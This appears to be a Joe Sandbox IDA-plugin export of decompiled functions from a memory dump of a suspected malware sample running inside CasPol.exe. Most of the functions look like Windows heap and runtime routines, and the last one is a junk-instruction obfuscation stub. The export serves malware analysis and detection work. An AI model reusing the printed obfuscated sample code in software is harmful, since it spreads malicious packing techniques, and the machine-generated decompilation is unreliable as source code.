                                                                0x016529ed
                                                                0x016529f3
                                                                0x016529f5
                                                                0x016529f8
                                                                0x016529fa
                                                                0x01652a97
                                                                0x01652a9a
                                                                0x01652a9d
                                                                0x01652add
                                                                0x00000000
                                                                0x01652a9f
                                                                0x01652aa2
                                                                0x01652aa5
                                                                0x01652aa8
                                                                0x01652aab
                                                                0x01695cab
                                                                0x01695caf
                                                                0x01695cc5
                                                                0x01695cda
                                                                0x01695cdc
                                                                0x01695cdf
                                                                0x01695ce5
                                                                0x00000000
                                                                0x01695ceb
                                                                0x01695ced
                                                                0x01695cee
                                                                0x00000000
                                                                0x01695cee
                                                                0x01695cb1
                                                                0x01695cb4
                                                                0x01695cb9
                                                                0x01695cbb
                                                                0x00000000
                                                                0x01695cbd
                                                                0x01695cbd
                                                                0x00000000
                                                                0x01695cbd
                                                                0x01695cbb
                                                                0x01652ab1
                                                                0x01652ab1
                                                                0x01652ac4
                                                                0x01652ac6
                                                                0x01652ac6
                                                                0x00000000
                                                                0x01652ac6
                                                                0x01652aab
                                                                0x00000000
                                                                0x01652a00
                                                                0x01652a09
                                                                0x01652a0e
                                                                0x01652a21
                                                                0x01652a24
                                                                0x01652a35
                                                                0x01652a3a
                                                                0x01652a3d
                                                                0x01652a42
                                                                0x01652a59
                                                                0x01652a59
                                                                0x01652a5c
                                                                0x01652a5f
                                                                0x01652a5f
                                                                0x016529fa
                                                                0x016529f3
                                                                0x01652a64
                                                                0x01652a64
                                                                0x01652a6b
                                                                0x01652a6b
                                                                0x01652a6d
                                                                0x01652a72
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e88fd6d18ed8f21eaef6f8fb28e8a7812cef5730bf0e524de18c6d770e098a7
                                                                • Instruction ID: 5964b7388d5917e1aa5a1f9cdfd674016ee2a26c5fbb03f880254b5c7df0a615
                                                                • Opcode Fuzzy Hash: 1e88fd6d18ed8f21eaef6f8fb28e8a7812cef5730bf0e524de18c6d770e098a7
                                                                • Instruction Fuzzy Hash: F7515771A0021ADFDF66DF99CC90ADEBBB6BF48350F058159ED01AB320C3359952CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01654BAD Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 85%
                                                                			E01654BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x171d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0162CC50(_t86);
					L11:
					return E0166B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1718504
				E01642280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0166FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0166B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01644620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0162CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1718504
								E0163FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01654F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                0x01654bad
                                                                0x01654bbf
                                                                0x01654bc2
                                                                0x01654bc6
                                                                0x01654bcd
                                                                0x01654bd9
                                                                0x016967fe
                                                                0x01696800
                                                                0x01654ccc
                                                                0x01654ccd
                                                                0x01654cb7
                                                                0x01654cc9
                                                                0x01654cc9
                                                                0x01654bdf
                                                                0x01654be5
                                                                0x00000000
                                                                0x00000000
                                                                0x01654beb
                                                                0x01654bef
                                                                0x00000000
                                                                0x00000000
                                                                0x01654bf5
                                                                0x01654bf9
                                                                0x01654c06
                                                                0x01654c0b
                                                                0x01654c17
                                                                0x01654c1c
                                                                0x01654c1f
                                                                0x01654c25
                                                                0x01654c33
                                                                0x01654c3d
                                                                0x01654c40
                                                                0x01654c43
                                                                0x01654c47
                                                                0x01654c4d
                                                                0x01654c53
                                                                0x01654c54
                                                                0x01654c55
                                                                0x01654c56
                                                                0x01654c5b
                                                                0x01654c5c
                                                                0x01654c63
                                                                0x01654c6b
                                                                0x00000000
                                                                0x00000000
                                                                0x01696776
                                                                0x01696784
                                                                0x01696784
                                                                0x0169679f
                                                                0x016967a7
                                                                0x016967af
                                                                0x016967ce
                                                                0x00000000
                                                                0x016967b1
                                                                0x016967b7
                                                                0x016967b8
                                                                0x016967c1
                                                                0x016967d3
                                                                0x016967d9
                                                                0x016967dd
                                                                0x01654c94
                                                                0x01654c94
                                                                0x01654c98
                                                                0x01654c9c
                                                                0x01654ca3
                                                                0x016967f4
                                                                0x016967f4
                                                                0x01654cb5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01654cb5
                                                                0x01654c79
                                                                0x01654c7e
                                                                0x01654c89
                                                                0x01654c8b
                                                                0x01654c8f
                                                                0x01654c8f
                                                                0x00000000
                                                                0x01654c89
                                                                0x016967c3
                                                                0x00000000
                                                                0x016967c3
                                                                0x016967af
                                                                0x01654c73
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bade290a37be359c74b238bdbc7fc7fb9bdfcb981f877e5eb85c58c14a067c48
                                                                • Instruction ID: a0759f153dec1b30f614cfd0cf76b2c32559973b879ba9c4a58a86ba7a6dc36c
                                                                • Opcode Fuzzy Hash: bade290a37be359c74b238bdbc7fc7fb9bdfcb981f877e5eb85c58c14a067c48
                                                                • Instruction Fuzzy Hash: 3E41BF31A002299BDF21DF68CD40BEE77B9EF49710F4100E9E908AB341EB349E80CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01654D3B Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			E01654D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x171d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0166FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1717bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0166B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01644620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0162CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0166B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0166F380(_t67 + 0xc, 0x1605138, 0x10) == 0) {
								 *0x17160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01654F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01654E70(0x17186b0, 0x1655690, 0, 0) != 0) {
					_t46 = E0162CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                0x01654d3b
                                                                0x01654d4d
                                                                0x01654d53
                                                                0x01654d58
                                                                0x01654d65
                                                                0x01654d6c
                                                                0x01654d71
                                                                0x01654d77
                                                                0x01654d7f
                                                                0x01654d8c
                                                                0x01654d8e
                                                                0x01654dad
                                                                0x01654db0
                                                                0x01654db7
                                                                0x01654db8
                                                                0x01654db9
                                                                0x01654dba
                                                                0x01654dbb
                                                                0x01654dc1
                                                                0x01654dc8
                                                                0x01654dcc
                                                                0x01654dd5
                                                                0x01654dde
                                                                0x01654ddf
                                                                0x01654de0
                                                                0x01654de1
                                                                0x01654de6
                                                                0x01654de7
                                                                0x01654de9
                                                                0x01654df3
                                                                0x00000000
                                                                0x00000000
                                                                0x01696c7c
                                                                0x01696c8a
                                                                0x01696c8a
                                                                0x01696c9d
                                                                0x01696ca7
                                                                0x01696cac
                                                                0x01696cb2
                                                                0x01696cb9
                                                                0x00000000
                                                                0x01696cbf
                                                                0x01696cbf
                                                                0x00000000
                                                                0x01696cbf
                                                                0x01696cb9
                                                                0x01654dfb
                                                                0x01696ccf
                                                                0x01696cd3
                                                                0x01654e32
                                                                0x01654e39
                                                                0x01696ce0
                                                                0x01696cf2
                                                                0x01696cf2
                                                                0x01696ce0
                                                                0x01654e3f
                                                                0x01654e41
                                                                0x01654e51
                                                                0x01654e51
                                                                0x01654e03
                                                                0x01654e03
                                                                0x01654e09
                                                                0x01654e0f
                                                                0x01654e57
                                                                0x00000000
                                                                0x00000000
                                                                0x01654e1b
                                                                0x01654e30
                                                                0x01654e5b
                                                                0x01654e5b
                                                                0x00000000
                                                                0x01654e30
                                                                0x01654e11
                                                                0x01654e11
                                                                0x01654e16
                                                                0x00000000
                                                                0x01654e16
                                                                0x01654e01
                                                                0x00000000
                                                                0x01654e01
                                                                0x01654da5
                                                                0x01696c6b
                                                                0x00000000
                                                                0x01654dab
                                                                0x01654dab
                                                                0x00000000
                                                                0x01654dab

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1373eea0602b5e57cbbf8d64f7d6047371f61a3f7c744381317b7fe0ea2ba976
                                                                • Instruction ID: 70659358f175ee2d2c53030309c8db400056f5492a0df43e6221f3906daaac24
                                                                • Opcode Fuzzy Hash: 1373eea0602b5e57cbbf8d64f7d6047371f61a3f7c744381317b7fe0ea2ba976
                                                                • Instruction Fuzzy Hash: 3741A471A443189FEB72DF18CC80FAAB7AAEB55610F0040D9ED4597381EB74ED84CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F2B28 Relevance: .1, Instructions: 129COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E016F2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1716110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E01642280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1716110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E016F241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E0163FFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E016F3209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E016EA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E0163FFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E016EA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1716110; // 0x3951a168
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                                                0x016f2b28
                                                                0x016f2b30
                                                                0x016f2b35
                                                                0x016f2b37
                                                                0x016f2b3a
                                                                0x016f2b3d
                                                                0x016f2b44
                                                                0x016f2b4d
                                                                0x016f2b4d
                                                                0x016f2b50
                                                                0x016f2b54
                                                                0x016f2bb0
                                                                0x016f2bbd
                                                                0x016f2be8
                                                                0x016f2bef
                                                                0x016f2bf4
                                                                0x016f2bf7
                                                                0x016f2bfa
                                                                0x016f2bfd
                                                                0x016f2c02
                                                                0x016f2c02
                                                                0x016f2c0f
                                                                0x016f2c13
                                                                0x016f2c3b
                                                                0x016f2c4a
                                                                0x016f2c4f
                                                                0x016f2c52
                                                                0x016f2c52
                                                                0x016f2c59
                                                                0x016f2c62
                                                                0x016f2c62
                                                                0x016f2c69
                                                                0x016f2c15
                                                                0x016f2c18
                                                                0x016f2c19
                                                                0x016f2c21
                                                                0x016f2c29
                                                                0x016f2c2f
                                                                0x016f2c2f
                                                                0x016f2c29
                                                                0x016f2bbf
                                                                0x016f2bc2
                                                                0x016f2bc3
                                                                0x016f2bc9
                                                                0x016f2bc9
                                                                0x016f2c72
                                                                0x016f2c72
                                                                0x016f2b56
                                                                0x016f2b5c
                                                                0x016f2b62
                                                                0x016f2b64
                                                                0x016f2b72
                                                                0x016f2b77
                                                                0x016f2ba3
                                                                0x016f2ba3
                                                                0x016f2ba5
                                                                0x016f2baa
                                                                0x00000000
                                                                0x016f2baa
                                                                0x016f2b7e
                                                                0x016f2b84
                                                                0x016f2b86
                                                                0x016f2b97
                                                                0x016f2b9c
                                                                0x016f2b9e
                                                                0x016f2b9e
                                                                0x00000000
                                                                0x016f2b9e
                                                                0x016f2b8b
                                                                0x016f2b90
                                                                0x00000000
                                                                0x00000000
                                                                0x016f2b95
                                                                0x00000000
                                                                0x016f2b95
                                                                0x016f2b6b
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6b699327e609b907e79105ee7d7b8e1139f424f027b1325e26c6104998c33210
                                                                • Instruction ID: c74aed5d8f3275420c725367531facc4c84f1f29e1b9eff5d373a75635d4f973
                                                                • Opcode Fuzzy Hash: 6b699327e609b907e79105ee7d7b8e1139f424f027b1325e26c6104998c33210
                                                                • Instruction Fuzzy Hash: E0410672A101095BD714CE6CCCA0A7ABBA9EF48224B05866DEE15CB380D774DD02CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016ED466 Relevance: .1, Instructions: 123COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E016ED466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x171d360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1716114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E016EDDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1716114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1716114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x171b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x1716110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E016ED864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E0163FFB0(_t69, _t90, _t90 + 0xc);
				}
				return E0166B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

























                                                                0x016ed475
                                                                0x016ed47b
                                                                0x016ed492
                                                                0x016ed49e
                                                                0x016ed4a4
                                                                0x016ed4ac
                                                                0x016ed4bc
                                                                0x016ed4be
                                                                0x016ed4c4
                                                                0x016ed4cc
                                                                0x016ed4dc
                                                                0x016ed4e1
                                                                0x016ed4f5
                                                                0x016ed4fb
                                                                0x016ed4fd
                                                                0x016ed501
                                                                0x016ed53d
                                                                0x016ed503
                                                                0x016ed507
                                                                0x016ed50e
                                                                0x016ed510
                                                                0x016ed520
                                                                0x016ed524
                                                                0x016ed526
                                                                0x016ed528
                                                                0x016ed52b
                                                                0x016ed52e
                                                                0x016ed530
                                                                0x016ed530
                                                                0x016ed533
                                                                0x016ed536
                                                                0x016ed537
                                                                0x016ed53b
                                                                0x00000000
                                                                0x00000000
                                                                0x016ed526
                                                                0x016ed4c6
                                                                0x016ed4c6
                                                                0x016ed4c8
                                                                0x016ed4c8
                                                                0x016ed4c8
                                                                0x016ed540
                                                                0x016ed545
                                                                0x016ed555
                                                                0x016ed55a
                                                                0x016ed55a
                                                                0x016ed560
                                                                0x016ed562
                                                                0x016ed56e
                                                                0x016ed56e
                                                                0x016ed577
                                                                0x016ed57d
                                                                0x016ed57d
                                                                0x016ed594
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb9ae85ea23bd97059a1b8a21fce9955adad1ab49a8a286daf9953d36f460039
                                                                • Instruction ID: 08915a66e10a6b86bb89fa4406ad6beaaaf56ca962ffc70f497cd339b66dfc17
                                                                • Opcode Fuzzy Hash: bb9ae85ea23bd97059a1b8a21fce9955adad1ab49a8a286daf9953d36f460039
                                                                • Instruction Fuzzy Hash: 74419071E011299BDB10CFADCC85ABEB7F9FF88214B158269E915EB340D770AD05CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0042196F Relevance: .1, Instructions: 121COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 70%
                                                                			E0042196F(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t14;
				signed int _t15;
				signed int _t18;
				signed char _t21;
				signed int _t23;
				signed int _t24;

				_t23 = __esi;
				_t15 = __ebx;
				_t18 = __ecx ^  *0xeddb9ae9;
				asm("rcl dword [0xeb851e81], 0xa4");
				 *0x2028133e =  *0x2028133e >> 0xf5;
				asm("scasb");
				_t21 = __edx ^  *0x93ae58ce;
				if(_t21 < 0) {
					L1:
					asm("sbb [0xc36efb09], edx");
					asm("adc [0x767ba821], ebx");
					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
					_t14 = _t14 & 0x0000000c;
					_t24 = (_t24 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
					asm("sbb ebp, [0x8771e3b]");
					_push(_t24);
					_t23 = _t23 &  *0x912dd0fb;
					_t21 = _t21 & 0x00000020;
					asm("rol byte [0xf89935f2], 0x22");
					asm("rol dword [0xfbe9540d], 0x6c");
					 *0x9459ca0a = _t18;
					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
					asm("adc bl, [0xc320ed3c]");
					asm("scasb");
					_t18 =  *0x9459ca0a - 1;
					 *0xaab74829 =  *0xaab74829 ^ _t14;
					asm("rcl dword [0x7f106817], 0x35");
					asm("adc eax, [0x9d56ea15]");
					_t15 = _t15 +  *0x5ceec7ba &  *0x3b22d9f7;
					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
					goto L1;
				}
				asm("rcl dword [0x5789a872], 0xac");
				_t6 = __esi;
				__esi =  *0xe184961e;
				 *0xe184961e = _t6;
				__ebp = __ebp - 1;
				 *0xd88934d1 =  *0xd88934d1 << 0xd5;
				asm("rol dword [0xabc0241b], 0x85");
				 *0xcab3817 =  *0xcab3817 - __ebx;
				__ebx = __ebx + 0x3a47b4a9;
				 *0xe5a61284 =  *0xe5a61284 - __dl;
				__ebx = __ebx - 1;
				asm("adc eax, [0x2024b9ef]");
				__eflags = __ecx -  *0x9210131;
				__ecx =  *0x9595246a * 0xc62b;
				_pop( *0xb8bb067);
				__esi =  *0xe184961e - 0xe193569b;
				__eflags = __esi;
				if(__esi >= 0) {
					goto L1;
				}
				__esp = __esp ^  *0x11e49e73;
				__eflags = __ebp - 0x820b7505;
				__dl = __dl ^ 0x00000020;
				 *0xde59899 =  *0xde59899 - __esi;
				asm("movsw");
				 *0x750511e5 =  *0x750511e5 >> 0x68;
				__ebp = 0x456500e;
				__esp = __esp ^ 0x997ff93e;
				asm("sbb ah, 0xb4");
				 *0x1fa0e502 =  *0x1fa0e502 + __bl;
				__eflags =  *0x1fa0e502;
				if(__eflags < 0) {
					goto L1;
				}
				 *0x870eb172 = __edx;
				if(__eflags != 0) {
					goto L1;
				}
				asm("sbb [0xd4bd8f7a], edi");
				__eflags = __ch & 0x000000e7;
				 *0x2011f092 =  *0x2011f092 << 0x90;
				__eflags =  *0xb19a15c8 - __edi;
				__bl = __bl | 0x000000e1;
				_t9 = __ecx;
				__ecx =  *0x219367c5;
				 *0x219367c5 = _t9;
				__eax = __eax - 1;
				__eax - 0x16955a65 = 0x456500e - 0xadfadef0;
				 *0x34ca1624 =  *0x34ca1624 >> 0xb3;
				__dl = __dl - 0x12;
				__eflags =  *0xdb9f85e5 - __al;
				asm("rcl dword [0x2ef568bd], 0xd2");
				__edi =  *0xe45a9785;
				asm("rcl dword [0x15362087], 0x31");
				 *0x980d34cb =  *0x980d34cb & __eax;
				 *0xe91e0f97 =  *0xe91e0f97 << 0x9b;
				__bl = __bl ^  *0x13edb686;
				__eflags = __bl;
				if(__bl < 0) {
					goto L1;
				}
				__edx =  *0x5cd1287c * 0x8a10;
				__ecx = __ecx -  *0x7080472e;
				__esi = 0x593a2905;
				_t10 = __ch;
				__ch =  *0xa775b4f6;
				 *0xa775b4f6 = _t10;
				__esp = __esp |  *0x7ddfed1;
				__eflags = __esp;
				 *0x4e2bccf6 = 0xf2;
				if(__esp < 0) {
					goto L1;
				}
				__esp = __esp | 0x09337e72;
				__esi =  *0x4f51fb6a * 0x77e7;
				__bl = __bl |  *0xa8badb6;
				 *0x221424a0 =  *0x221424a0 & __cl;
				 *0xaca990a =  *0xaca990a - __dh;
				__ebp = 0x456500d;
				asm("sbb esp, 0x2ac0173b");
				__bl =  *0x75d702b3;
				__eax =  *0xfaa4f03;
				__eflags =  *0x549368f6 & __cl;
				asm("adc [0x966f6d10], ah");
				_push( *0x4f51fb6a * 0x77e7);
				 *0xc0a4e224 =  *0xc0a4e224 >> 0xfe;
				 *0x594bd41b =  *0x594bd41b << 0x8f;
				asm("movsw");
				__eflags =  *0x4b8dce5 & __al;
				 *0x940d543e =  *0x940d543e ^ 0x0456500e;
				asm("movsb");
				asm("rcr dword [0x418de92], 0x8a");
				__edx = __edx | 0xfa9dea65;
				__ebp = 0x52eda39f;
				asm("rcl dword [0xc12212d], 0xe4");
				asm("adc ecx, [0x7e02cdce]");
				asm("stosd");
				__eflags = __edi -  *0xe307b4c2;
				return  *0xfaa4f03;
			}









                                                                0x0042196f
                                                                0x0042196f
                                                                0x0042196f
                                                                0x0042197b
